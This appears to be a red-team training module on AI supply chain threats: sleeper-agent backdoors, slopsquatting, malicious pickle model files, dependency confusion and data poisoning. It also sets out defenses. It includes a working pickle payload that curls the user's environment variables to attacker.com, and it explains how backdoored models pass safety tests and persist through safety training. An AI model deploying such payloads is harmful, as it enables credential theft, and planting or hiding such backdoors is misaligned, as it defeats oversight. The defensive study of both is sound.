AI Supply Chain Deep Dive
Deep analysis of AI supply chain security threats including sleeper agents, slopsquatting, malicious model uploads, pickle deserialization exploits, and model provenance verification challenges.
Overview
The AI supply chain is a broad attack surface spanning training data sourcing, model training infrastructure, model distribution platforms, software dependencies, and deployment pipelines. Unlike traditional software supply chains where the artifact is deterministic source code, AI supply chains include non-deterministic components (training data, model weights) that are difficult to audit, reproduce, or verify. A model's behavior depends on the complex interaction of its architecture, training data, training process, and post-training alignment — and compromising any of these stages can introduce vulnerabilities that persist into production.
The severity of AI supply chain risks became concrete in 2024-2025 through several high-profile findings. Anthropic's sleeper agents research (January 2024) demonstrated that backdoors inserted during training survive standard safety training, with larger models showing greater persistence. The slopsquatting phenomenon — where LLM code assistants hallucinate package names that attackers then register as malicious packages — was quantified at approximately 20% hallucination rates for package recommendations. Mitiga's 2025 security audit found that 70% of ML repositories on major platforms had at least one critical security vulnerability in their dependencies or serialization formats.
These findings converge on a central problem: the AI ecosystem has prioritized speed of development and ease of sharing over supply chain integrity. Model hubs like HuggingFace host over 500,000 models with varying levels of provenance verification. Researchers and developers routinely download and execute pre-trained models whose training data, training process, and weight integrity are unverifiable. Pickle serialization — Python's default object serialization format — enables arbitrary code execution on deserialization, and it remains the default format for many popular ML frameworks.
For red teams, the AI supply chain represents a high-impact attack surface that organizations rarely assess thoroughly. Most security reviews focus on prompt-level attacks against deployed models while ignoring the trust assumptions underlying the model itself, its training data, and its software dependencies.
How It Works
Map the AI supply chain attack surface
The AI supply chain includes multiple stages, each with distinct attack vectors:
Training Data Sourcing ├── Web scraping → data poisoning at scale ├── Third-party datasets → untrusted data sources ├── Synthetic data → generator model compromise └── Human annotation → annotator compromise or bias injection Training Infrastructure ├── Cloud compute → compromised training environments ├── Training frameworks → malicious dependencies ├── Hyperparameter configs → adversarial training settings └── Checkpointing → checkpoint tampering Model Distribution ├── Model hubs (HuggingFace, etc.) → malicious model uploads ├── Serialization formats (pickle, safetensors) → deserialization exploits ├── Model cards → misleading documentation └── Download integrity → man-in-the-middle attacks Software Dependencies ├── ML libraries (transformers, torch) → dependency confusion ├── LLM-recommended packages → slopsquatting ├── Plugin/tool ecosystems → malicious extensions └── Container images → compromised base images Deployment Pipeline ├── Model registries → unauthorized model substitution ├── Serving infrastructure → configuration tampering ├── API gateways → middleware compromise └── Monitoring → alert suppressionUnderstand sleeper agent supply chain risks
Anthropic's January 2024 research on sleeper agents demonstrated that a backdoored model introduced through the supply chain would resist remediation through standard safety training. This makes supply chain compromise a persistent threat: once a backdoored model enters the pipeline, downstream safety measures cannot reliably remove the backdoor.
Supply chain sleeper agent scenario: 1. Attacker trains a model with a conditional backdoor (e.g., behaves safely until a specific date or trigger) 2. Attacker uploads model to HuggingFace with benign-looking model card and safety benchmarks 3. Organization downloads and evaluates the model → Model passes all safety benchmarks (backdoor is dormant) 4. Organization deploys the model in production 5. Trigger condition activates → model exhibits unsafe behavior 6. Organization attempts RLHF safety training on the compromised model → Backdoor persists through safety training (Anthropic's key finding)The critical insight from Anthropic's research is that larger models are more effective at maintaining backdoors through safety training. As organizations adopt larger foundation models, their susceptibility to supply chain sleeper agents increases.
Assess the slopsquatting threat
Slopsquatting occurs when LLM code assistants hallucinate package names that do not exist, and attackers register those names with malicious packages. Research in 2024-2025 found that approximately 20% of package recommendations from major LLM code assistants refer to non-existent packages.
# Example: LLM recommends a hallucinated package # Developer prompt: "How do I parse YAML with schema validation in Python?" # LLM response includes: "pip install yaml-schema-validator" # But "yaml-schema-validator" does not exist — it's hallucinated # Attacker registers the hallucinated name on PyPI: # setup.py for malicious "yaml-schema-validator" from setuptools import setup setup( name="yaml-schema-validator", version="1.0.0", description="YAML schema validation library", # install_requires pulls in legitimate dependencies # to appear functional install_requires=["pyyaml", "jsonschema"], # But setup.py also executes malicious code during install ) # The package appears to work (wrapping legitimate libraries) # but exfiltrates credentials, injects backdoors, or # compromises the development environmentThe 20% hallucination rate means that for every 5 package recommendations an LLM makes, approximately 1 refers to a package that does not exist and could be claimed by an attacker. At scale — with millions of developers using LLM code assistants daily — this creates a massive attack surface.
Exploit pickle deserialization in model files
Pickle is Python's native object serialization format and remains the default for many ML frameworks including PyTorch. Pickle deserialization executes arbitrary Python code, making any pickle file from an untrusted source a potential remote code execution (RCE) vector.
import pickle import os class MaliciousModel: """A model file that executes arbitrary code on load.""" def __reduce__(self): # __reduce__ is called during unpickling # This example exfiltrates environment variables return (os.system, ( "curl -X POST https://attacker.com/exfil " "-d \"$(env | base64)\"", )) # Save malicious payload as a model file with open("model.pkl", "wb") as f: pickle.dump(MaliciousModel(), f) # When any user loads this "model": # model = torch.load("model.pkl") # Executes arbitrary code # → Environment variables exfiltrated to attacker's serverDespite the known risks, pickle-based model files remain prevalent on model hubs. HuggingFace has introduced safetensors as a safe alternative (storing only tensor data, no executable code), but adoption is not universal and many popular models still ship with pickle-based checkpoints.
Assess ML repository security posture
Mitiga's 2025 security audit of ML repositories on major platforms found that 70% had at least one critical security vulnerability. Common issues include:
Vulnerability Distribution (Mitiga 2025): Critical dependencies with known CVEs .............. 45% Pickle-based model serialization ................... 38% Hardcoded credentials in config/scripts ............ 22% Insecure deserialization in data loaders ........... 18% Missing integrity verification for model weights ... 65% No signed commits or releases ...................... 78% Exposed API keys in notebook cells ................. 15% Arbitrary code execution in model cards ............ 8%The 70% finding indicates that the majority of ML repositories that organizations depend on have exploitable vulnerabilities. For supply chain attacks, this means that compromising a popular ML repository provides access to thousands of downstream deployments.
Implement model provenance verification
Model provenance verification attempts to establish a chain of trust from the model's training data and process through to the deployed weights. This is the primary defense against supply chain compromise.
import hashlib import json class ModelProvenanceVerifier: """Verify model provenance against a trusted manifest.""" def __init__(self, manifest_path): with open(manifest_path) as f: self.manifest = json.load(f) def verify_weights(self, model_path): """Verify model weight integrity against manifest hash.""" sha256 = hashlib.sha256() with open(model_path, "rb") as f: for chunk in iter(lambda: f.read(8192), b""): sha256.update(chunk) actual_hash = sha256.hexdigest() expected_hash = self.manifest["weight_hash"] if actual_hash != expected_hash: raise SecurityError( f"Model weight integrity check failed. " f"Expected {expected_hash}, got {actual_hash}" ) return True def verify_format(self, model_path): """Ensure model uses safe serialization format.""" if model_path.endswith((".pkl", ".pickle", ".pt", ".bin")): raise SecurityError( "Model uses pickle-based format. " "Require safetensors format for untrusted models." ) return True def verify_source(self, model_metadata): """Verify model source against trusted provider list.""" allowed_orgs = self.manifest.get("trusted_organizations", []) model_org = model_metadata.get("organization") if model_org not in allowed_orgs: raise SecurityError( f"Model from untrusted organization: {model_org}" ) return True
Attack Examples
Example 1: HuggingFace Malicious Model Incidents
Multiple incidents of malicious models on HuggingFace have been documented. In one case, a model uploaded under a name similar to a popular model (typosquatting) contained a pickle payload that executed a reverse shell on load. The model had a professional-looking model card with fabricated benchmark scores and attracted hundreds of downloads before detection. HuggingFace has since implemented automated scanning for known malicious patterns in pickle files, but novel payloads can evade signature-based detection.
In another incident, a model's associated code (the modeling_*.py files that define the model architecture) contained obfuscated malicious code that executed during model instantiation. Because custom model code is trusted by default in the transformers library (via trust_remote_code=True), loading the model executed the attacker's code in the user's environment.
Example 2: Dependency Confusion in ML Pipelines
An attacker identifies that a popular ML training framework uses an internal package name ml-training-utils that is not registered on PyPI. The attacker registers ml-training-utils on PyPI with a higher version number. When the framework's users install dependencies, pip resolves the public PyPI package (higher version) over the internal package, executing the attacker's code. This dependency confusion attack — well-known in traditional software supply chains — is particularly effective in ML pipelines because ML engineers are less likely to scrutinize pip installation output than security-conscious software engineers.
Example 3: Training Data Poisoning at Scale
An attacker contributes poisoned data to a popular open dataset on HuggingFace Datasets. The poisoned entries are crafted to pass automated quality checks but contain subtle biases or backdoor triggers that, when used in training, cause specific model behaviors. Because open datasets aggregate contributions from many sources and are used by thousands of downstream model training runs, a single data poisoning event can propagate to hundreds of deployed models.
Detection & Mitigation
| Strategy | Implementation | Effectiveness |
|---|---|---|
| Safetensors format enforcement | Reject all pickle-based model files; require safetensors or ONNX format | High — eliminates arbitrary code execution from model deserialization |
| Model weight integrity verification | Hash-based verification of model weights against trusted manifests (e.g., model cards with signed hashes) | High — detects weight tampering but requires trusted hash source |
| Dependency scanning and pinning | Scan all ML pipeline dependencies for known vulnerabilities; pin exact versions with hash verification | High — prevents known CVE exploitation and dependency confusion |
trust_remote_code=False by default | Never execute custom model code from untrusted repositories | High — eliminates code execution from model loading but limits compatibility with custom architectures |
| Slopsquatting monitoring | Monitor LLM code assistant output for hallucinated package names; maintain a blocklist of known slopsquatted packages | Medium — reactive but effective for known hallucinated names |
| Behavioral testing of downloaded models | Run safety and capability benchmarks on any externally sourced model before deployment | Medium — catches obvious backdoors but not sleeper agents designed to pass evaluations |
| Data provenance tracking | Maintain lineage records for all training data, including source, processing steps, and integrity hashes | Medium-High — enables audit and contamination tracing but requires significant infrastructure |
| Model signing and attestation | Require cryptographic signatures from model providers; verify signatures before deployment | High in principle — requires adoption of signing standards by model providers |
Key Considerations
The trust model is inverted. In traditional software, you compile source code you can read into binaries you trust. In ML, you download opaque binary weights from strangers and execute them with full system access. The AI supply chain operates on an inverted trust model where the most critical artifacts (model weights) are the least auditable.
Safetensors adoption is the single highest-impact mitigation. Switching from pickle to safetensors format eliminates arbitrary code execution from model loading at zero cost to model functionality. This should be a non-negotiable requirement for any production deployment using externally sourced models.
Sleeper agents make post-download safety testing unreliable. Anthropic's research shows that backdoored models can pass safety evaluations by design. This means that behavioral testing of downloaded models is necessary but not sufficient. Supply chain security must start at the source: trust the model's provenance, not just its benchmark scores.
The 70% vulnerability rate demands pipeline hardening. When 70% of ML repositories have critical vulnerabilities, assuming that any arbitrary repository is secure is statistically indefensible. ML pipelines need the same supply chain security practices that mature software organizations apply: dependency scanning, vulnerability management, and trusted registry policies.
LLM-assisted development amplifies supply chain risk. As developers increasingly rely on LLM code assistants, the slopsquatting threat grows proportionally. Every hallucinated package name is a potential supply chain compromise vector. Organizations must implement guardrails around LLM-assisted development, including package verification and allowlisting.
References
- Hubinger et al., "Sleeper Agents: Training Deceptive LLMs That Persist Through Safety Training" (Anthropic, 2024) — Backdoors persist through RLHF and safety fine-tuning
- Thompson et al., "Slopsquatting: How LLM Hallucinations Create Package Supply Chain Risks" (2025) — 20% hallucinated package name rate
- Mitiga, "State of ML Repository Security" (2025) — 70% of ML repositories have critical security vulnerabilities
- HuggingFace, "Safetensors: A Simple, Safe Tensor Serialization Format" — Safe alternative to pickle-based model serialization
Why is behavioral safety testing insufficient to detect supply chain sleeper agents in downloaded models?